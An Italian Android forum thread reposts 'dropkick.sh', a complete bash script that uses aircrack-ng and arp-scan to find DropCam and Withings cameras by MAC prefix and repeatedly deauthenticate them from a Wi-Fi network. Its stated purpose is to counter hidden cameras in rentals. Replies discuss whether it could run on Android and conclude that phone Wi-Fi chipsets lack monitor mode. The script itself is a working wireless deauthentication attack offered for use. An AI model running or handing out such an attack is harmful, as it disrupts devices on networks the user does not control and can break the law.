Galaxy, Nexus, Xperia, Optimus o altri dispositivi "robotici"? Che si tratti di configurare il telefono o tablet, installare una ROM "cucinata" o scambiare quattro chiacchiere sui migliori dispositivi, la community Android si incontra qui.
#!/bin/bash
#
# DROPKICK.SH
#
# Detect and Disconnect the DropCam and Withings devices some people are using to
# spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
#
# http://julianoliver.com/output/log_2014-05-30_20-52
#
# This script was named by Adam Harvey (http://ahprojects.com), who also
# encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
# etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
# notification. Comment it out if you don't need it.
#
# See also http://plugunplug.net, for a plug-and-play device that does this
# based on OpenWrt. Code here:
#
# https://github.com/JulianOliver/CyborgUnplug
#
# Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
#
# sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
shopt -s nocasematch # Set shell to ignore case
shopt -s extglob # For non-interactive shell.
readonly NIC=$1 # Your wireless NIC
readonly BSSID=$2 # Network BSSID (AirBnB WiFi network)
readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not
# present.
readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings
readonly POLL=30 # Check every 30 seconds
readonly LOG=/var/log/dropkick.log
airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device
while true;
do
for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
'([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
do
if [[ "$TARGET" == "$GGMAC" ]]
then
# Audio alert
beep -f 1000 -l 500 -n 200 -r 2
echo "WiFi camera discovered: "$TARGET >> $LOG
aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG
echo '
__ __ _ __ __
___/ /______ ___ / /__ (_)___/ /_____ ___/ /
/ _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ /
\_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/
/_/
'
else
echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
fi
done
echo "None found this round."
sleep $POLL
done
airmon-ng stop mon0
Potrebbe funzionare con una interfaccia wireless esterna, collegata tramite USB e compatibile con aircrack-ng e, ovviamente, root!
Il limite infatti è proprio la "modalità monitor" di aircrack richiesta dallo script che, per quello che ne so io, non è possibile con le interfacce wireless dei cellulari (qualche anno fa, c'era stato un tentativo di reverse engineering solo per chipset della broadcom).
"Let me tell you a secret: when you hear that the machine is “smart”, what it actually means is that it’s exploitable." Mikko Hypponen
Ganondolf ha scritto: ↑dom ott 22, 2017 3:35 am
Per funzionare quello script ha bisogno di aircrack-ng, che dubito tu possa compilare su android...
È teoricamente possibile! [1] [2] Ma compilarlo è solo una perdita di tempo proprio perché il limite è il chipset del wifi che senza patch non supporta la modalità "monitor"... il problema è che non ci sono nemmeno le patch per i chipset degli smartphone!!
Inserendo un messaggio, dichiari di aver letto e accettato il regolamento di partecipazione.
Nello specifico, sei consapevole che ti stai assumendo personalmente la totale responsabilità delle tue affermazioni, anche in sede civile e/o penale,
manlevando i gestori di questo sito da ogni coinvolgimento e/o pretesa di rivalsa.
Dichiari inoltre di essere consapevole che il messaggio sarà visibile pubblicamente, accetti di diffonderlo con licenza
CC BY-NC-SA 3.0 (con attribuzione a "TurboLab.it") e rinunci ad ogni forma di compensazione (economica o altro).
Rinunci inoltre esplicitamente a qualsiasi pretesa di cancellazione del messaggio.